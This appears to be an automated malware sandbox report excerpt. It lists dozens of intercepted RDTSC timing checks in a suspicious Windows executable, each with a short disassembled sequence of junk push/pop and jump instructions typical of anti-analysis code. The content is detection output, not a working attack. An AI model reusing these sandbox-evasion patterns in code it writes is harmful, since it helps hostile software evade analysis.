Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0AD6F second address: B0AD7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5BD0FFF0C6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0AD7A second address: B0AD8A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5BD0C7BA72h 0x00000008 jns 00007F5BD0C7BA66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0B04D second address: B0B053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0B053 second address: B0B057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0B057 second address: B0B076 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5BD0FFF0D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0B1B9 second address: B0B1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0B1BD second address: B0B1CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F5BD0FFF0C6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0B1CD second address: B0B1D3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0B1D3 second address: B0B1DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B10AA6 second address: B10AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B10AAC second address: B10ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5BD0FFF0C6h 0x0000000a jne 00007F5BD0FFF0C6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B10ABD second address: B10AC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5BD0C7BA66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B11277 second address: B11289 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007F5BD0FFF0C6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B159F6 second address: B15A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F5BD0C7BA6Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B15A0B second address: B15A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0FFF0CDh 0x00000009 popad 0x0000000a push edx 0x0000000b je 00007F5BD0FFF0C6h 0x00000011 jp 00007F5BD0FFF0C6h 0x00000017 pop edx 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B19C03 second address: B19C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA76h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B19C21 second address: B19C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F5BD0FFF0CCh 0x0000000e jnp 00007F5BD0FFF0C6h 0x00000014 jl 00007F5BD0FFF0CCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B19C3D second address: B19C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B193C2 second address: B193CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5BD0FFF0C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B193CC second address: B193E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5BD0C7BA76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B193E7 second address: B193FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 jno 00007F5BD0FFF0C8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B19817 second address: B1981D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B1F491 second address: B1F4B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5BD0FFF0C6h 0x0000000a jmp 00007F5BD0FFF0D9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B1F4B4 second address: B1F4D1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5BD0C7BA66h 0x00000008 jmp 00007F5BD0C7BA70h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B1F621 second address: B1F630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F5BD0FFF0CEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B1F8EF second address: B1F8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5BD0C7BA66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B1F8F9 second address: B1F90B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B1FC44 second address: B1FC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5BD0C7BA66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BD0C7BA71h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B1FC62 second address: B1FC66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B1FF66 second address: B1FF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5BD0C7BA6Dh 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B2051B second address: B2055D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnp 00007F5BD0FFF0C6h 0x0000000b pop eax 0x0000000c jg 00007F5BD0FFF0D4h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F5BD0FFF0D8h 0x0000001c pushad 0x0000001d popad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B2055D second address: B2057E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA75h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F5BD0C7BA66h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B2057E second address: B20582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B208D9 second address: B208DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B208DE second address: B208E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B20BAB second address: B20BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B20BB1 second address: B20BCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B20BCD second address: B20BD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B2119B second address: B211A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B211A3 second address: B211A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B29A24 second address: B29A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F5BD0FFF0CEh 0x0000000a pushad 0x0000000b jmp 00007F5BD0FFF0D8h 0x00000010 jo 00007F5BD0FFF0C6h 0x00000016 jmp 00007F5BD0FFF0D1h 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F5BD0FFF0CBh 0x00000028 popad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B29A7E second address: B29A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B29A84 second address: B29A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B29A8A second address: B29AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F5BD0C7BA76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B29D2A second address: B29D69 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BD0FFF0D5h 0x00000008 jmp 00007F5BD0FFF0CFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F5BD0FFF0D8h 0x0000001d popad 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B29D69 second address: B29D6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B29D6F second address: B29D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B29D73 second address: B29D77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B29EE5 second address: B29EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B320DE second address: B320EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F5BD0C7BA66h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B32274 second address: B32278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B32278 second address: B322A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 jmp 00007F5BD0C7BA78h 0x0000000e je 00007F5BD0C7BA66h 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B322A0 second address: B322B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5BD0FFF0C6h 0x0000000a jp 00007F5BD0FFF0C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B32F37 second address: B32F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B32F3B second address: B32F5C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5BD0FFF0D3h 0x0000000d jne 00007F5BD0FFF0C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B32F5C second address: B32F75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA75h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B32F75 second address: B32FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5BD0FFF0D1h 0x0000000d ja 00007F5BD0FFF0DAh 0x00000013 jmp 00007F5BD0FFF0D4h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B32FA8 second address: B32FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0C7BA6Eh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B336A5 second address: B336AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B336AE second address: B336BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B336BA second address: B336BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B3AD09 second address: B3AD18 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5BD0C7BA66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B3AD18 second address: B3AD36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5BD0FFF0C6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5BD0FFF0CDh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B3AD36 second address: B3AD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B4D0D8 second address: B4D0F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D9h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B4D0F6 second address: B4D142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA6Eh 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F5BD0C7BA9Ch 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F5BD0C7BA78h 0x0000001a push eax 0x0000001b pop eax 0x0000001c jmp 00007F5BD0C7BA6Eh 0x00000021 popad 0x00000022 push esi 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B4F62D second address: B4F648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0FFF0D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B4F648 second address: B4F66B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Fh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F5BD0C7BA6Eh 0x00000011 push edx 0x00000012 pop edx 0x00000013 jp 00007F5BD0C7BA66h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B5CD92 second address: B5CDB7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5BD0FFF0E0h 0x00000008 jmp 00007F5BD0FFF0D8h 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B63EC2 second address: B63EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B63EC8 second address: B63ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B63ECC second address: B63ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B63ED0 second address: B63F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F5BD0FFF0CCh 0x0000000e pushad 0x0000000f push ecx 0x00000010 jmp 00007F5BD0FFF0D3h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5BD0FFF0CCh 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B63F0A second address: B63F26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B64065 second address: B6406D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B6406D second address: B6407B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B6407B second address: B6408D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jl 00007F5BD0FFF0C6h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B64351 second address: B6435B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5BD0C7BA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B6435B second address: B64375 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F5BD0FFF0D3h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B6501D second address: B65033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F5BD0C7BA6Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B65033 second address: B65058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5BD0FFF0CFh 0x0000000a pushad 0x0000000b jmp 00007F5BD0FFF0CEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B68975 second address: B6897B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B6897B second address: B6897F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B6897F second address: B6898F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a js 00007F5BD0C7BA66h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B6898F second address: B689EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D9h 0x00000007 jmp 00007F5BD0FFF0D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007F5BD0FFF0F6h 0x00000016 push edx 0x00000017 jns 00007F5BD0FFF0C6h 0x0000001d pushad 0x0000001e popad 0x0000001f pop edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5BD0FFF0D2h 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B689EB second address: B689EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B689EF second address: B689F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A8059F second address: A805AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5BD0C7BA66h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A805AC second address: A805C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BD0FFF0D4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A805C5 second address: A805D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5BD0C7BA66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
